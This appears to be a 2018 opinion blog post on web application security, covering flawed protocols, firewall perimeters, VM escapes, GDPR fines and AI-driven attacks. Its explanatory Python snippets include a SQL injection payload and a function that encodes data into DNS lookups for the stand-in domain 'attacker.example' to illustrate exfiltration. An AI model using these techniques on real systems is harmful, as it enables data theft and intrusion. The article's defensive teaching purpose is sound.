
Overcoming kludges to secure web applications

May 21, 2018 | 8 mins
Application Security | Enterprise Applications | Network Security

Nothing is easy when applications sit atop multiple kludges of network architecture and flawed protocols. Without adequate safeguards, security becomes a hit-and-miss affair.

When it comes to technology, nothing is static, everything is evolving. Either we keep inventing mechanisms that dig out new security holes, or we are forced to implement existing kludges to cover up the inadequacies in security on which our web applications depend.

The assault on the changing digital landscape, with all its new requirements, has created a black hole that demands attention. The shift in technology, while creating opportunities, also tends to create security threats. Unfortunately, with the passage of time, these trends will continue to escalate, putting web application security at center stage.

Business relies on web applications. Loss of service to business-focused web applications not only affects the brand but also results in financial loss. The web application acts as the front door to valuable assets. If you don't effectively lock the door, or at least know when it has been opened, valuable revenue-generating web applications are left exposed.

We need to work together to identify and fix vulnerabilities in the web application before the bad actors find ways to exploit them. With the introduction of machine-based threats driven by Artificial Intelligence (AI), security threats now come in many different forms.

The ongoing challenges

The problem lies in the fact that the underlying infrastructure was built without security in mind. Over time, this shortfall has resulted in the use of numerous kludges to cover the security inadequacies. Networking is complex, and so is the design of the web application and web server.

Over the last decade, security paradigms have changed completely. Hypervisor escapes are scaring CIOs from the public cloud. To add to the challenge, now we have AI in the hands of bad actors. This lays the foundation for an unpredictable security landscape.

The combination of all these elements is causing security professionals to move with a certain caution and with guardrails in place. The most appropriate place to protect the web application is at the application layer, not with another kludge.

Tools like the Acunetix vulnerability scanner find web application vulnerabilities such as SQL Injection and Cross-Site Scripting (XSS). They arm applications with the appropriate scanning and vulnerability detection to stand a chance against both today's threats and the unknown day-zero threats of tomorrow.
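SQL Injection, one of the vulnerability classes such scanners hunt for, comes down to attacker-controlled input being interpreted as SQL. A minimal sketch (the `users` table and inputs below are illustrative, not from any real application) shows a vulnerable string-built query against a parameterized one:

```python
import sqlite3

# Illustrative in-memory database with a single hypothetical table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

malicious = "x' OR '1'='1"

# Vulnerable: the input is concatenated straight into the SQL text,
# so the OR clause rewrites the query and matches every row.
vulnerable = f"SELECT name FROM users WHERE name = '{malicious}'"
leaked = conn.execute(vulnerable).fetchall()   # returns all rows

# Safe: a parameterized query treats the input as data, not SQL.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (malicious,)
).fetchall()                                   # returns no rows
```

A scanner automates exactly this probe-and-compare exercise across every input the application exposes.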

Unsecured underlying infrastructure

The underlying infrastructure, in which our applications live, is built without security in mind. This is not a design error. It is a design solution based on previous connectivity requirements. Bad actors did not exist back in those days when the foundations were being designed. Security was an afterthought. Internet Protocol (IP) was solely used to provide end-to-end connectivity and had no way to secure individual packets by default. A network left to defaults leaves the web application wide open.

The rise of security concerns has bred a new type of requirement, which has led to the introduction of flawed protocols such as TLS/SSL. The entire Internet rides on these protocols, offering up ports 80 and 443 to everyone as a consequence of global reachability. Most of the Internet's traffic sits on top of TLS/SSL, yet the foundations were built without an initial authentication layer.

Two parties that have never met can initiate a connection without ever knowing each other. Authentication occurs only after the initial connection has been made. This exposes connections to a number of vulnerabilities and creates the potential to eavesdrop on the communication between two endpoints, unlocking the gateway to "man-in-the-middle" attacks.
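That ordering is visible in any TLS client: the unauthenticated TCP connection is established first, and only then does the handshake prove the server's identity. A minimal sketch with Python's standard `ssl` module (the hostname is a placeholder and the network call is left commented out):

```python
import socket
import ssl

# A default client context enforces certificate and hostname checks --
# but only during the TLS handshake, not at TCP connect time.
ctx = ssl.create_default_context()

def fetch_peer_cert(host: str, port: int = 443) -> dict:
    # Step 1: plain TCP connection. No identity has been proven yet;
    # anyone answering on this port completes this step.
    with socket.create_connection((host, port), timeout=5) as raw:
        # Step 2: TLS handshake. The server is authenticated only now,
        # after the connection already exists.
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            return tls.getpeercert()

# fetch_peer_cert("example.com")  # placeholder host; needs network access
```

An on-path attacker only has to win step 1; step 2 is what finally stops them, which is why it must never be disabled.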

Network & web application complexity

The underlying network is one of the most complicated structures, and complexity is the number one enemy of security. There are many moving parts to a network. The issues resulting from flawed protocols, such as the lack of a session layer in the Transmission Control Protocol (TCP), are often pushed down to the network layer to be solved, forcing the network to provide load balancing. These flaws are great for vendors, as they create new opportunities. However, at the same time, they add layers of wrinkles to the communication path.

The web application stack has transitioned from simple text files to complicated application programming interface (API) calls. Everything has become an API call, which has further changed the security requirements. The web application teams that design the application framework are usually not equipped with the right security skills. Their main function is to get the code working; security is often an afterthought. The teams that build the web server are often different from the teams that design and build the web applications. This leaves a huge gap for anyone armed with basic hacking tools.

Changing security paradigm

The birth of virtualization has created new traffic flows. Initially, we began with standard north-south traffic, but now we also have east-west traffic flows. Old security devices were not designed to handle this change in flow.

The bulky central firewall stuck in the middle of the network was the central security point. Traffic would have to trombone to it, adding latency and building up piles of obsolete policy rules. The firewall alone is simply not enough anymore. This led to the introduction of mini-firewalls located closer to the workload, but they lacked feature parity with their big brother. This opened the lid on holes in the network, empowering bad actors to compromise valuable web applications.

Mini-firewalls closer to workloads resulted in the dissolution of the security perimeter. In the early days, when I first set foot in networking, we had static boundaries. A demilitarized zone (DMZ) would hold external sources, and a bulky firewall would control all the policies between a number of predefined interfaces. The changing security perimeter now allows external resources entry to the network. Not only does this bring technical challenges, but it also brings to light issues with team collaboration. Who controls the new firewalls? And do those in charge have appropriate security knowledge? With the introduction of the cloud, the perimeters have become increasingly vulnerable.

The cloud entails a plethora of new virtualization technologies that tie together to form a multi-tenant environment. Different customers with different types of workloads potentially share the same physical hardware. The scary fact is that we have seen what are known as hypervisor breakouts, or virtual machine (VM) escapes, where a bad actor compromises one VM and uses it as a beachhead to access a VM belonging to an entirely different customer.

A world of false positives and high penalties

We live in a world of false positives and alert fatigue. Many data breaches and exfiltrations go unnoticed for months. The human mind simply cannot process all the alerts. The rising level of false positives demotivates security professionals from looking deeper into potential threats. This leaves open many paths for a bad actor to enter the network.

Once a bad actor gains access, he or she can circumvent security defenses such as a firewall or intrusion detection system (IDS). There are known, easy-to-learn techniques for lateral movement across the network that lead to data breaches and data exfiltration. Social media such as Twitter accounts, and protocols never intended to transfer data, such as the Domain Name System (DNS), have been used to move sensitive information out of a network.
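DNS makes a useful covert channel because outbound lookups are almost always allowed. The trick, in sketch form, is to encode stolen bytes into the subdomain labels of queries for a domain the attacker controls; the domain below is a placeholder and no queries are actually sent, as the point is to show defenders what the traffic shape looks like:

```python
import base64

MAX_LABEL = 63  # DNS limits each label to 63 bytes (RFC 1035)

def encode_as_dns_queries(data: bytes,
                          domain: str = "attacker.example") -> list[str]:
    # Base32 keeps the payload within DNS's case-insensitive charset.
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    # Split into label-sized chunks and prepend each to the domain,
    # producing hostnames that look like ordinary lookups.
    chunks = [encoded[i:i + MAX_LABEL]
              for i in range(0, len(encoded), MAX_LABEL)]
    return [f"{chunk}.{domain}" for chunk in chunks]

# Illustrative payload only; a resolver the attacker runs would log
# and decode these names on the far side.
queries = encode_as_dns_queries(b"card=4111-1111")
```

Long, high-entropy subdomains and bursts of lookups to a single domain are exactly the signals DNS-monitoring tools alert on.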

With the General Data Protection Regulation (GDPR) landing, it's not just about meeting compliance anymore; it's about avoiding financial penalties. Upon a data breach, organizations can incur fines of up to 4% of annual worldwide turnover or 20 million euros, whichever is higher. To add insult to injury, this is amplified by the fact that we now have machine-based cybercriminals to deal with.
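The "whichever is higher" clause is worth making concrete, since it means the 4% figure only bites above 500 million euros of turnover. A small sketch of the ceiling set by Article 83(5):

```python
def max_gdpr_fine(annual_turnover_eur: float) -> float:
    # Art. 83(5) GDPR: up to EUR 20 million or 4% of total worldwide
    # annual turnover, whichever is higher.
    return max(20_000_000.0, 0.04 * annual_turnover_eur)

# A firm with EUR 1 billion turnover faces a EUR 40 million ceiling;
# a smaller firm at EUR 100 million still faces the EUR 20 million floor.
```

In other words, the regulation scales the penalty with the organization rather than capping it at a flat figure.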

Machine-based AI attacks

We started with the human attacker and have now entered a world of machine-based AI threats. The major turning point for security came in the form of automatically spreading malware. Now experts are of the opinion that we are entering a new era of AI-based threats.

Machine-based AI, invented for very good reasons, is now being used by cybercriminals. These attacks can change their signatures and vectors automatically in response to the defenses they meet. They are quicker and a lot more dangerous.

AI-based attacks are leagues ahead of the traditional command and control (C&C) servers that still require human intervention. AI removes human involvement. The machine does not stop, it will dynamically change and throw everything automatically at the web application stack.

The roofs are leaky and are getting leakier. New vulnerabilities continue to arrive and drill new holes in the roof. You have two options. You can leave your web application in the hands of the network with existing security kludges, or you can effectively align your web application and web server with the appropriate vulnerability and scanning tools.


Matt Conran has more than 19 years of networking industry experience with entrepreneurial start-ups, government organizations and others. He is a lead architect and has successfully delivered major global greenfield service provider and data center networks. His core skill set includes advanced data center, service provider, security and virtualization technologies. He loves to travel and has a passion for landscape photography.

The opinions expressed in this blog are those of Matt Conran and do not necessarily represent those of IDG Communications, Inc., its parent, subsidiary or affiliated companies.